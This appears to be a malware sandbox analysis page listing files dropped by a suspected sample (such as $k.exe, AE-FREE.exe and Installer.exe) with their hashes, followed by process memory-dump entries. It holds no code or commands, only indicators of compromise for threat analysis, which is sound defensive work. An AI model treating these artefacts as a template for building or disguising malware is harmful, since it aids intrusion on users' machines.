5b1f39ec9ee37c72832b5cbc7820e8b123053715fb5628db208e1389107786f8e71747aa4c3b7203fb9c0fa601e20e53ae5329d3c1c66dbced033815ac1a1151

Download Submit
C:\Users\Admin\AppData\Roaming\$k.exe

Filesize
48KB

MD5
1e8a020876016dfb400e1f94db3dd866

SHA1
fbeb8ac7335c139b5d08f929e979d0aa317981e2

SHA256
463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

SHA512
298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Download Submit
C:\Users\Admin\AppData\Roaming\$k.exe

Filesize
48KB

MD5
1e8a020876016dfb400e1f94db3dd866

SHA1
fbeb8ac7335c139b5d08f929e979d0aa317981e2

SHA256
463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

SHA512
298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Download Submit
C:\Users\Admin\AppData\Roaming\$k.exe

Filesize
48KB

MD5
1e8a020876016dfb400e1f94db3dd866

SHA1
fbeb8ac7335c139b5d08f929e979d0aa317981e2

SHA256
463e516bfaec76fb7bdb524772acbbcc64aa8d04bba7eea319fa0751f645bcf2

SHA512
298e253211e9ab739f2aaafc41ba09f2f234587abe677e7d239e0897865cb5684d28a007545809a0e2c2fa6840efb367fda86b4b1243e3124f74897e6e953ce0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ba53ffdfea9e4cd4b490673f540c62d4

SHA1
5e53d5fdf60069af43c8b17ba4329a61884f9cbb

SHA256
19baca7f7ec59cf068880cc3c32cc6337c42ec3abc83f93d17b020412bffc1d5

SHA512
59d9f7ba266d4015aa21e595e109faca623c1fd9615022f211eabe54f058acd6dc9139f350701d511aa79890d12ab8b4a1a783e8cf0fe7e554c283ce9fa7f204

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ba53ffdfea9e4cd4b490673f540c62d4

SHA1
5e53d5fdf60069af43c8b17ba4329a61884f9cbb

SHA256
19baca7f7ec59cf068880cc3c32cc6337c42ec3abc83f93d17b020412bffc1d5

SHA512
59d9f7ba266d4015aa21e595e109faca623c1fd9615022f211eabe54f058acd6dc9139f350701d511aa79890d12ab8b4a1a783e8cf0fe7e554c283ce9fa7f204

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ba53ffdfea9e4cd4b490673f540c62d4

SHA1
5e53d5fdf60069af43c8b17ba4329a61884f9cbb

SHA256
19baca7f7ec59cf068880cc3c32cc6337c42ec3abc83f93d17b020412bffc1d5

SHA512
59d9f7ba266d4015aa21e595e109faca623c1fd9615022f211eabe54f058acd6dc9139f350701d511aa79890d12ab8b4a1a783e8cf0fe7e554c283ce9fa7f204

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YIU154EP64R693Z5XZFV.temp

Filesize
7KB

MD5
ba53ffdfea9e4cd4b490673f540c62d4

SHA1
5e53d5fdf60069af43c8b17ba4329a61884f9cbb

SHA256
19baca7f7ec59cf068880cc3c32cc6337c42ec3abc83f93d17b020412bffc1d5

SHA512
59d9f7ba266d4015aa21e595e109faca623c1fd9615022f211eabe54f058acd6dc9139f350701d511aa79890d12ab8b4a1a783e8cf0fe7e554c283ce9fa7f204

Download Submit
\Users\Admin\AppData\Local\Apps\Installer.exe

Filesize
91KB

MD5
9b778cfe0e786463a843f7d98e38dc41

SHA1
1bc4def9348a341d9cc3e75fd28df09d1ba53f38

SHA256
8483f2e72d60c031df90acb798d909d567f07315367961a992daca6fd41b4876

SHA512
a8373d6073b490d40264015068f5379e1d2f4e778e21dfcd51fea835695fc3b9bd8e077de1b98da5232cb54fe9585828fa54963fa469b459c1296cded9274111

Download Submit
\Users\Admin\AppData\Local\Apps\python310.dll

Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
\Users\Admin\AppData\Local\Temp\AE-FREE.exe

Filesize
1.1MB

MD5
17daa2459db2c35a6bce85f9c50ce6e1

SHA1
73812f97c50d8ec2540274b8524d0a1406937c04

SHA256
7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2

SHA512
cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

Download Submit
\Users\Admin\AppData\Local\Temp\AE-FREE.exe

Filesize
1.1MB

MD5
17daa2459db2c35a6bce85f9c50ce6e1

SHA1
73812f97c50d8ec2540274b8524d0a1406937c04

SHA256
7d91aec3960bd6d583ce554928a18fa1309f98c32239f301d354703bc9987ee2

SHA512
cbec14acc3d5ef57f29555d7c546e2ecf038bd1155e9eb5868d74db4036383fcc8b5445d3bcfd1726970ba4f0e5bc48625c9e633402b493fbd3000c74f72199b

Download Submit
memory/288-161-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

Filesize
9.6MB

Download
memory/288-155-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

Filesize
9.6MB

Download
memory/288-156-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download
memory/288-157-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

Filesize
9.6MB

Download
memory/288-160-0x000000000270B000-0x0000000002772000-memory.dmp

Filesize
412KB

Download
memory/288-159-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download
memory/288-158-0x0000000002700000-0x0000000002780000-memory.dmp

Filesize
512KB

Download
memory/420-71-0x0000000000870000-0x000000000089B000-memory.dmp

Filesize
172KB

Download
memory/420-72-0x000007FEBF9B0000-0x000007FEBF9C0000-memory.dmp

Filesize
64KB

Download
memory/420-60-0x0000000000840000-0x0000000000864000-memory.dmp

Filesize
144KB

Download
memory/420-58-0x0000000000840000-0x0000000000864000-memory.dmp

Filesize
144KB

Download
memory/420-61-0x0000000000870000-0x000000000089B000-memory.dmp

Filesize
172KB

Download
memory/420-75-0x0000000037830000-0x0000000037840000-memory.dmp

Filesize
64KB

Download
memory/420-92-0x0000000077841000-0x0000000077842000-memory.dmp

Filesize
4KB

Download
memory/420-63-0x0000000000870000-0x000000000089B000-memory.dmp

Filesize
172KB

Download
memory/464-100-0x00000000009C0000-0x00000000009EB000-memory.dmp

Filesize
172KB

Download
memory/464-103-0x0000000037830000-0x0000000037840000-memory.dmp

Filesize
64KB

Download
memory/464-80-0x00000000009C0000-0x00000000009EB000-memory.dmp

Filesize
172KB

Download
memory/464-102-0x000007FEBF9B0000-0x000007FEBF9C0000-memory.dmp

Filesize
64KB

Download
memory/472-124-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/472-123-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/472-125-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

Filesize
9.6MB

Download
memory/472-121-0x00000000029D0000-0x0000000002A50000-memory.dmp

Filesize
512KB

Download
memory/472-120-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

Filesize
9.6MB

Download
memory/472-119-0x00000000025F0000-0x00000000025F8000-memory.dmp

Filesize
32KB

Download
memory/472-122-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

Filesize
9.6MB

Download
memory/472-118-0x000000001B1B0000-0x000000001B492000-memory.dmp

Filesize
2.9MB

Download
memory/480-109-0x0000000000060000-0x000000000008B000-memory.dmp

Filesize
172KB

Download
memory/480-112-0x0000000037830000-0x0000000037840000-memory.dmp

Filesize
64KB

Download
memory/480-110-0x000007FEBF9B0000-0x000007FEBF9C0000-memory.dmp

Filesize
64KB

Download
memory/480-90-0x0000000000060000-0x000000000008B000-memory.dmp

Filesize
172KB

Download
memory/1724-97-0x000000001B130000-0x000000001B1B0000-memory.dmp

Filesize
512KB

Download
memory/1724-30-0x0000000000FA0000-0x0000000000FB2000-memory.dmp

Filesize
72KB

Download
memory/1724-131-0x000000001B130000-0x000000001B1B0000-memory.dmp

Filesize
512KB

Download
memory/1724-31-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

Filesize
9.9MB

Download
memory/1724-81-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

Filesize
9.9MB

Download
memory/1728-20-0x000000001B290000-0x000000001B310000-memory.dmp

Filesize
512KB

Download
memory/1728-17-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

Filesize
9.9MB

Download
memory/1728-15-0x0000000000EA0000-0x0000000000ED4000-memory.dmp

Filesize
208KB

Download
memory/1728-32-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

Filesize
9.9MB

Download
memory/1788-138-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

Filesize
9.6MB

Download
memory/1788-136-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1788-137-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1788-132-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/1788-133-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

Filesize
9.6MB

Download
memory/1788-134-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/1788-135-0x000007FEEDE50000-0x000007FEEE7ED000-memory.dmp

Filesize
9.6MB

Download
memory/2320-1-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

Filesize
9.9MB

Download
memory/2320-2-0x000000001B290000-0x000000001B310000-memory.dmp

Filesize
512KB

Download
memory/2320-18-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

Filesize
9.9MB

Download
memory/2320-0-0x0000000000260000-0x0000000000370000-memory.dmp

Filesize
1.1MB

Download
memory/2464-46-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2464-52-0x00000000777F0000-0x0000000077999000-memory.dmp

Filesize
1.7MB

Download
memory/2464-45-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2464-55-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2464-50-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2464-48-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2464-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/2464-53-0x00000000776D0000-0x00000000777EF000-memory.dmp

Filesize
1.1MB

Download
memory/2464-111-0x00000000777F0000-0x0000000077999000-memory.dmp

Filesize
1.7MB

Download
memory/2564-43-0x00000000776D0000-0x00000000777EF000-memory.dmp

Filesize
1.1MB

Download
memory/2564-38-0x0000000001230000-0x00000000012B0000-memory.dmp

Filesize
512KB

Download
memory/2564-36-0x0000000001230000-0x00000000012B0000-memory.dmp

Filesize
512KB

Download
memory/2564-33-0x0000000019D00000-0x0000000019FE2000-memory.dmp

Filesize
2.9MB

Download
memory/2564-76-0x00000000777F0000-0x0000000077999000-memory.dmp

Filesize
1.7MB

Download
memory/2564-79-0x00000000776D0000-0x00000000777EF000-memory.dmp

Filesize
1.1MB

Download
memory/2564-41-0x0000000000F90000-0x0000000000FBA000-memory.dmp

Filesize
168KB

Download
memory/2564-35-0x000007FEEF620000-0x000007FEEFFBD000-memory.dmp

Filesize
9.6MB

Download
memory/2564-34-0x0000000000D90000-0x0000000000D98000-memory.dmp

Filesize
32KB

Download
memory/2564-37-0x000007FEEF620000-0x000007FEEFFBD000-memory.dmp

Filesize
9.6MB

Download
memory/2564-40-0x0000000001230000-0x00000000012B0000-memory.dmp

Filesize
512KB

Download
memory/2564-39-0x0000000001230000-0x00000000012B0000-memory.dmp

Filesize
512KB

Download
memory/2564-42-0x00000000777F0000-0x0000000077999000-memory.dmp

Filesize
1.7MB

Download
memory/2564-54-0x000007FEEF620000-0x000007FEEFFBD000-memory.dmp

Filesize
9.6MB

Download
memory/2976-202-0x00000000009F0000-0x0000000000A02000-memory.dmp

Filesize
72KB

Download
memory/2976-203-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

Filesize
9.9MB

Download
memory/2976-278-0x000007FEF5E30000-0x000007FEF681C000-memory.dmp

Filesize
9.9MB

Download
memory/2992-149-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

Filesize
9.6MB

Download
memory/2992-148-0x00000000029E0000-0x0000000002A60000-memory.dmp

Filesize
512KB

Download
memory/2992-147-0x00000000029E0000-0x0000000002A60000-memory.dmp

Filesize
512KB

Download
memory/2992-146-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

Filesize
9.6MB

Download
memory/2992-145-0x00000000029E0000-0x0000000002A60000-memory.dmp

Filesize
512KB

Download
memory/2992-144-0x000007FEEE7F0000-0x000007FEEF18D000-memory.dmp

Filesize
9.6MB

Download